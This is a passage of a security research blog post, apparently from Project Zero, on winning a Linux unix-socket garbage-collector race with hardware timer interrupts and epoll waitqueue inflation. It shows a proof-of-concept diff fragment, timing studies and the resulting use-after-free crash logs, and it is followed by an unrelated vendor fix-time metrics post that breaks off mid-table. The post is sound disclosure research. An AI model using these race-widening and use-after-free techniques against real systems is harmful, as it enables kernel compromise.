High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
  • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
  • If it returns the old victim FD number:
  • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
  • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@

     }

 

+#if 0

     // bounce socket's file refcount over to other cpu

     pin_to(2);

     close(SYSCHK(dup(RESURRECT_FD+1-1)));

     pin_to(1);

+#endif

 

     //printf("setting timer\n");

@@ -352,5 +354,5 @@

     close(loop_root);

     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

       /* All candidates should have been detached by now. */

        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an X86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

